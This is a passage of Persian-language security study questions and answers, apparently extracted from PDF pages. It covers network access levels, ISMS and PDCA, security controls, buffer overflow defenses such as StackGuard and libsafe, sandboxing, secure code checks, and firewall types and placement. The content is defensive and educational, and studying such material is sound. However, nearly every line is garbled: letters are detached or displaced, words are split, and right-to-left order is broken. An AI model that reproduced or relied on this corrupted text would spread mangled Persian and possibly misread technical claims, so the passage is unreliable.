ن امکـان ارتبـاط يهمچنـ . دهـد يار کاربران شبکه دولت قرار م يانا در اخت يکاربران متصل به شبکه دولت،اح

.ورد آي شبکه دولت را فراهم ميسهايکاربران سازمان به سرو

کاربران داخل سازمان به شبکه سازمان يک سو امکان دسترس ينترنت که از ي به شبکه ا يبخش دسترس •

نترنـت قـرار يار کـاربران ا ي بر وب سازمان را در اختي مبتنيسهايگر سروي دي آوردواز سويرا فراهم م

. دهديم

رد؟ي گي قرار مي مورد بررسييک سازمان در چه محورهاي يتي مخاطرات امن‐۱۰ شبکهيمعمار .۱ زات شبکهيتجه .۲ شبکهيس دهنده هايسرو .۳ ي کاريستگاه هايا .۴ شبکهيت و نگهداريريمد .۵ ت شبکهيت امنيري مديالت وروشهايتشک .۶

شود؟يم ميبه شبکه به چند سطح تقس)يمنطق(يکي الجيت شبکه سازمان دسترسينه امني در زم‐۱۱ سطح سازمان •

ر مجـاز بـه خطـوط يـ غ يا دسترسـ يـ ک پورت از شبکه يار داشتن يحضور در سازمان و در اخت

شبکهچيارتباط

Page 41: Q&A

٤٠

ي عادي معتبر کاربرaccountار داشتن يحضور در سازمان و در اخت

يسطح دولت • به شبکه سازماني مجاز به شبکه دولت و مجاز نبودن به دسترسيداشتن دسترس سازمان به شبکه ي مجاز به شبکه دولت و مجاز بودن به دسترسيداشتن دسترس

نترنتيسطح ا • نترنت سازماني به اي در شبکه دسترس Accountنترنت و نداشتن يق شبکه اي از طريدسترس نترنت سازماني به اي در شبکه دسترس Accountنترنت و داشتن يق شبکه اي از طريدسترس

Remote Accessسطح • معتبر Account سازمان نداشتن Remote Accessاطالع از شماره معتبر Account سازمان داشتن Remote Accessع از شماره اطال

.ديان کني بيتيستم جامع امنيک سيرا در ISMS يه هاي پا‐۱۲

: شوديه بنا مي پا۳ت اطالعات بريت امنيريستم مديس

:يتي امنياست ها و دستورالعمل هايس‐۱

ن قـسمت يـ آنهـا در ا ي و داده ها يعات اطال يستم ها ي نحوه محافظت از س ي مرتبط برا يکه طرحها و برنامه ها

ن يـي شامل تع ير فن يبخش غ .گرددي ارائه م ي وفن ير فن ي سطح غ ۲ در يتي امن ياستراتژ.رندي گ يمورد توجه قرار م

ي الزم بـرا يه دسـتور العمـل هـا يـ شامل ته ي و بخش فن يتي امن ي مطلوب و انتخاب استاندارد ها يتيسطوح امن

. باشد يک ميل به اهداف استراتژي جهت نيتيتم امنسي سي و نظارت بر اجزايريبکار گ

: يتي و محصوالت امني تکنولوژ‐۲

ستم ها و شبکه هـا يران س ي شامل مد يتيستم امن ي س يت و اجرا يريکه شامل افراد مرتبط با مد :ييعوامل اجرا ‐۳

. است ي،پرسنل و کاربران عاد

.ت معطوف استيت امنيري به قسمت مدISMSالبته الزم به ذکر است که عمده توجه

.ديان کني را بيتي امني فوائد استفاده از استاندارد ها‐۱۳

د ها يمن ساختن اطالعات و کاهش تهدينان از تداوم تجارت و کاهش صدمات توسط اياطم‐

ت و محافظت داده ها ي با استاندارد امنينان از سازگارياطم‐

ها يريم گينان کردن تصميقابل اطم‐

ي تجاريان و شرکاينان از نزد مشتريجاد اطميا‐

ر شرکت هايامکان رقابت بهتر با سا‐

.تي امنياده سازيا در پيت فعال و پويريجاد مديا‐

.باشدي ميد و شامل چه فازهايرا به اختصار شرح دهPDCAمدل ‐۱۴

ير شاخه هاين فاز زيا.ف استيدر واقع مرحله مشخصه شدن تعارPLANمرحله

Scope,policy,risk assessment,risk treatmentشوديم ميتقس .

Scope: هدفISMS گرددين ميف و تدويتعر

Page 42: Q&A

٤١

Policy: مـد نظـر يروس خاصـ يـ ا مقابلـه بـا و يـ مـا مهـم اسـت ؟آ يت بـرا يـ چون چـرا امن يبه سواالت مهم

. شوديپاسخ داده م.....است؟Risk Assessment :ن ين بخش با توجه به تدويدر اpolicyرا محافظـت کـرده و يزيچم چه ي دانيم

. ما چقدر خواهد بوديسطح قابل قبول خطا برا

Risk Treatment:خـود ييدوتوانايري پذيا خطا را ميآ:رندي گين بخش قرار مي که در ايسواالت اساس

دومحـصوالت خـود را ي کن يرش خطا اجتنـاب مـ يد؟از پذ ين بردن خطا اعتماد کامل دار ي و از ب ي شناسائ يبرا

د؟ي شبکه داشته باشي رويد کنترل مناسبي خواهيا ميد؟آي کنيمه ميب

DO:و کنترل ها و پردازش هايتي امنياست هاي سي و اجراياده سازيپ،

CHECK: يتـ ي مختلـف امن ياست ها ي س ياده ساز يت ها ،پ ي موفق يابي است ارز يابين مرحله که فاز ارز يدر ا

. خواهد شدي گرد آوريتيري مدي و گزارش هاي عملين تجربه هايو هم چن

ACT:ح موارد مختلفين تصحيت اطالعات و همچنيري در نحوه مدي و باز نگريمي موارد ترمياجرا

PLANبازگشت به مرحله . باشديا مي و پويات پروسه چرخشين عمليا

.ديکني ميابيران را چگونه ارزي در ايتي امنيستم هايعلت ضعف س ‐۱۵

ت را يـ ت امن يري مـد يک سـطح بـاال يـ م ي خـواه يض م ين و مر ييات پ يريک مد ينکه ما با يت و ا يريضعف مد

.م شديم که مسلما دچار مشکل خواهيجاد کنيا

:دي هر سازمان را نام ببري و ارتباطي اطالعاتيستم هاياز سي مورد نيتي امنيکنترل ها ‐۱۶

سازمانيتياست امنين سيتدو‐۱

تيالت امنيتشک‐۲

الزمي هان کنترلييه ها و تعي سرمايطبقه بند‐۳

يت پرسنليامن‐۴

يراموني و پيکيزيت فيامن‐۵

يت ارتباطات و بهره برداريريمد‐۶

يکنترل دسترس‐۷

ستم هاي سيبانيتوسعه و پشت‐۸

تيت تداوم فعاليريمد‐۹

ي سازگار‐۱۰

نا امنيکار با کدها) د . ديح دهي را توضbuffer over flow يريب پذي محافظت از آسيک هاي انواع تکن‐١ : وجود داردbuffer over flow يريب پذي از آسيريشگيک جهت پي تکن۴ ي طور کلبه

Page 43: Q&A

٤٢

۱ .static analysis : ک کد منبـع و يز استاتي ها آناليريب پذي از سو استفاده از آسيريشگي پين راه هاي از بهتريکي

. کدي اصطالحا بازرسيعني. ش از ارائه نرم افزار استي پينريکد با

لر اصالح شده بـه طـور يک کامپا ي تواند با استفاده از ي م developerار باشد ياگر کد منبع در اخت : لرياصالح کامپا . ۲

ن يـ ايين راهکارهاي موجود با چنيلرهايکامپا. را وارد برنامه کندbuffer overflowص دهنده يک تشخيک ياتومات

.RAD(ess DefenderReturn Addr, Stack shield, pro police, Stack guard(: تا هستند۴

ي سـاده بـرا ي از راه ها يکي. کند يستم عامل استفاده م ي از س ييسم از اصالح بخش ها ين مکان يا: ستم عامل ياصالح س . ۳

بـار ي کدهايشتر حمالت با اجرايچون ب(ر قابل اجرا باشدي است که غي به صورتstack segmentمحافظت اصالح

تـوان بـا ي هنـوز هـم مـ ي کـرد ولـ يريم جلـوگ ي توان از حمالت مـستق ي شکل منيبه ا) رديگي صورت م stackشده در

indirect کردن اجرا به heap ا توابع موجود مثل يsystem() گر اسـتفاده از يراه د . ات مورد نظر را انجام داد ي عمل

ن يگزي آن جاsafeک ورژن ير را با يب پذي که هر فراخوان به توابع آس ي است به صورت libsafeکتابخانه اصالح شده

. کنديم

سـرعت ي ازراه ها يکيهستند، % ۱۰۰۰تا % ۴ از overhead ي ذکر شده دارا يک ها يتمام تکن : اصالح سخت افزار .۴

ک راهکـار يـ Smash guard.ات از نرم افزار به سخت افـزار اسـت ي برابر انتقال عمل۱۰۰تا ۱۰ات از يدن به عمليبخش

ت در مقابل يجاد امني اي براCPU در Ret و Call دستورات ياصالح شده برا ي هاmicro codeاز : کنديارائه م

buffer overflowکندي استفاده م .

.دي را شرح ده sand boxingسم ي مکان ‐٢Sand boxing ي اجـرا ي توانـد بـرا يط اجرا محدود شده است، کـه مـ يک محيجاد ي ايک معروف برايک تکني

در واقـع . دهـد يش را کاهش م ي ها application يق که سطح دسترس ين طر ير رود، به ا ر مطمئن به کا ي غ يبرنامه ها

sand box مـثال اگـر پروسـه . ا حفاظ استيک جعبه يp پروسـه فرزنـدش q ک يـ را درsand box ،اجـرا کنـد

privilege پروسه q از يرمجموعه ا ي ز privilege پروسه p يب اگر اجرا ين ترت يبه ا . است q رفتار منجر بر اثر سو

.ابدي نمير بخش ها تسري شود و به ساي مختص و محدود مq شود، خسارت فقط به همان حوزه يبه بروز خسارت

:ر استي به شرح ز sand boxing ي هاياده سازي از پيبعض

Virtual machine - :(VMs)ي توانند براي مي مجازين هاي ماش sand boxزمان اجرا به کار روند کـه ي ها

ن يماشـ . شـود ي مـ ي محاسـبات ي هـا platform هـا در applicationنان کاربر نسبت بـه يث باال رفتن سطح اطم باع

.ک مثال استي جاوا يمجاز

Application -ک ي توانند خودشان شامل ي ها مsand boxباشند . اده يـ توانـد پ يکند مـ ي که فراخوان ها را متوقف کرده و چک م يي کاربر به صورت کتابخانه ها ي در فضا layerک ي ‐

.ستير کرنل نيي هم به تغيازيق نين طريبه ا. کنديجاد مي را اsand boxک ي شود که در واقع يساز

. شودياده سازيستم عامل پي تواند در کرنل سي مsand boxing layerک ي ‐

ت کند؟يد رغاي باييزهايست وجچه چي کد امن چ‐٣

Page 44: Q&A

٤٣

چک کردن رخصت , ر مطمئن قبل از استفاده از آن ي غ يل مطابقت داده ها يازقبن ي است که قوان ي کد

ر مجـاز اعمـال کنـد وهـر يار کاربران غ ي حساس در اخت يعدم گذاشتن داده ها , اتيک عمل يانجام دادن

.ديستم را منع نماي به سيتجاوز

د؟يستا را ذکر کنيل ايات روش تحليخصوص‐٤ سد ي بنويدي کد جديکينکه هر ياز به اي کند بدون نينتقل مه ميس به بقيک برنامه نويخبره •

خطا در برنامه هم نـشان ي کند وجا ي باشد را به سرعت کشف م يدن آنها سخت م ي که د ييخطاها •

.بدهد

. کد را کشف کند ياز به اجراي تواند خطاها را بدون نين روش ميا •

شود واز آن به بعد به صـورت يخته م ک بار پردا ينه آن ينه وکارا است که هز ي کم هز يلي خ يروش •

شودي اجرا مي هر کديک روياوتومات

د مشخص کند ؟ي باييزهاي چه چي چک کننده مقدار به صورت کل‐٥ . کند يد مي است که داده تولير قابل اعتماديمنابع غ •

ن داده ها يح اي تصحيد انجام شود براي که بايچک کردن ها •

)trusting sink( شود يرياز آن جلوگد ينان که باي اطميفروبردن ها •

د ؟ير قابل اعتماد را ذکر کني منابع غ‐٦ يتمي سي هايفراخوان •

. کند ي کار بر کپي تواند داده از فضاي که مين هايروت •

شودي که از شبکه گرفته ميداده ها •

ست ؟ ين اشتباه در چک کردن مرزها چيمشهورتر‐٧م ي آن را انجـام دهـ يي مرز بـاال يم وعمل چک فقط برا ي دار بگذار ر عالمت يس در متغ يا اند يک مقدار ي

ن سوء استفاده کند يي پاي بتواند از مرزهاي شود نفوذي که باعث ميامر

د؟ينان را ذکر کني اطميانواع فرو بردن ها‐٨ ه ها يس آراياند •

ک حلقه يمرز •

ک تابعي يطول آرگومان در فراخوان •

ست ؟يستا چيل اير مقابل تحل ديدينقطه ضعف چک کردن تقل‐٩در . تواند کشف کنـد ي آن نم يف نشده برا ي را که قبال تعر ي بر تعداد فرم ثابت استوار است وخطاها يدي چک تقل

. استنباط کردن خطاهاي کند براياز رفتار کد استفاده م MCکه روش يحال

رواليفا) ه

.ديح دهيرا توض) Circuit-Level( سطح مدار يروالهاي فا‐١

انـه پشتـشان يرا با را TCP آنها ارتباط. کننديعمل م TCP ارتباطاتيبرا ک رلهيروالها به عنوان ين فايا

کـه ارتبـاط اسـت يتنها پس از برقرار. پردازنديه مي اولييانه به پاسخگوي آن رايخود به جا کنند ويقطع م

Page 45: Q&A

٤٤

ي مرتبط اجازه عبور ميداده ا يا به بسته هادا کند و تنهيان پيانه مقصد جري دهند تا داده به سمت راياجازه م

دهنـد و لـذا سـرعت ي قـرار نمـ ياطالعات را مورد بررس يچ داده درون بسته هايروالها هين نوع از فايا. دهند

. دهنديز نميرا ن (TCP) ر ازير پروتکلها غي سايت بر رويمحدود جاديضمنا امکان ا. دارنديخوب

ست؟ ي سرورچي پروکسيروالهاي فا‐۲

سـرور يک پروکـس يـ . پـردازد يه کـاربرد مـ يدر ال اطالعاتي بسته هاي سرور به بررسي پروکسيروالهايفا

آنهـا درخواسـت را ي کند و خـود بـه جـا ي پشتش را قطع ميکاربرد يدرخواست ارائه شده توسط برنامه ها

. کنـد ي ارسـال مـ ي کاربردي برنامه هايافت و سپس برايز ابتدا خود دريدرخواست را ن جهينت. کنديارسال م

را ييت بـاال يـ امن ي خـارج ي کـاربرد يم برنامه با سرورها و برنامـه هـا ي از ارتباط مستقيريروش با جلوگ نيا

ن ي اي توانند بر مبناي شناسند ، لذا ميم سطح کاربرد رايروالها پروتکلهاين فاي که ايياز آنجا. کندين ميتام

جـاد ي بـه ا ي داده اي بسته هـا ي محتواي توانند با بررسين آنها ميهمچن .ندجاد کني را اييتهايپروتکلها محدود

ن ازيهمچنـ . انجامـد يروالهـا ب ين فايـ اي توانـد بـه کنـد ي مين سطح بررسيالبته ا. بپردازند الزميتهايمحدود

ازش کنـد، را پردييانتها کاربري کاربردي و اطالعات برنامه هايک وروديد ترافيروالها باين فاي که اييآنجا

ستند و کـاربر ي شفاف نييد کاربر انتهاياز د سرورهاياغلب اوقات پروکس. ابدي يشتر کاهش مي آنها بييکارا

.رديروالها را به کار بگين فاياد جاد کند تا بتوانيا را در برنامه خوديراتييمجبور است تغ

روال کجاست؟ي نصب فاين مکان برايبهتر ‐۳

ن امر يا. ميکن نصبي شبکه خصوصيخروج/يروال را در درگاه ورودي رسد که فايممعموال مناسب به نظر

شـبکه يطـرف و جداسـاز کيـ روال از ي بـا کمـک فـا ي شـبکه خـصوص ي برايتين پوشش امنيجاد بهتريبه ا

شـبکه يد بـرا يـ وجود دارند کـه با يي اگر سرورها . کند يگر کمک م ي از طرف د ي از شبکه عموم يخصوص

ن يـ قـرار دادن ا . ديـ قـرار ده DMZ هيـ روال و در ناحيرا بعد از فـا باشند ، بهتر است آنها در دسترس يعموم

ن يـ بـه ا ي دسترسـ ي بـرا يروال جهت صدور اجازه به کـاربران خـارج يم فايوتنظ يسرورها در شبکه خصوص

. ديـ ا هروال باز کـرد ير هکرها را در فايچون شما خود مس. يخواهد بود با هک شدن شبکه داخل سرورها برابر

شما يشبکه خصوص ازي شبکه عمومي براي قابل دسترسي، سرورها DMZ هي که با استفاده از ناحيدر حال

ش يروال را پـ يسـرورها نفـوذ کننـد بـازهم فـا ني به اي جدا هستند، لذا اگر هکرها بتوانند به نحويکيزيبطور ف

قيـ را که از طريوط به اتصاالت مختلف کنند اطالعات مربي مي مدرن سعيروالهايشتر فاي ب. خود دارنديرو

کنند تا تنهـا ين اطالعات کمک ميا. کنندي وصل کرده است، نگهداري را به شبکه عموميآنها شبکه داخل

است که نقطـه ورود و خـروج تيجه حائز اهميدر نت. وارد شوندي مجاز به شبکه خصوصي اطالعاتيبسته ها

روال باشديک فايق ي از طرياز شبکه خصوص/ اطالعات بهيتمام

.ديح دهي را توضيه اي اليروالهاي فا‐۴

ي بـا مـشکل ياگـر اولـ . رنـد يگ ر قـرار يروال در مسيا چند فاي باال بهتر است از دو يتي با درجه امنيدر شبکه ها

يروال مـورد اسـتفاده از شـرکتها يا چنـد فـا يـ معمـوال بهتـر اسـت دو . دهدي به کار ادامه ميروبرو شود، دوم

Page 46: Q&A

٤٥

بتواننـد نيري از آنهـا ، سـا يکـ يدر يتيحفره امن اي يافزار ک اشکال نرمي باشند تا در صورت وجود يفمختل

.ن کننديت شبکه را تاميامن

ست؟ي چي شخصيروالهاي فا‐٥

مقابلـه بـا يآنهـا بـرا . شـوند ي نصب مي شخصيها انهي راي هستند که بر روييروالهاي ، فاي شخصيروالهايفا

دارنـد و تنهـا بـه ين آگـاه ي در حـال اجـرا در ماشـ يبرنامـه هـا معموال از. شده انديح طرايحمالت شبکه ا

بـر يروال شخـص يک فـا يـ دهند که به کار بپردازند نصب ين برنامه ها اجازه ميا جاد شده توسطيارتباطات ا

طرف زا. دهديش ميروال شبکه را افزاي توسط فايشنهاديت پيرا سطح امنيد است زيار مفيبس PC کي يرو

روال شـبکه يشـوند ، فـا ي از حمالت از درون شبکه حفاظت شده انجام مـ ياري که امروزه بسييگر از آنجايد

ر يي به تغيازيمعموال ن. د خواهد بوديار مفيبس يروال شخصيک فاي آنها انجام دهد و لذا ي براي تواند کارينم

.ستين) يهمانند پروکس(شده نصبيروال شخصيبرنامه جهت عبور از فا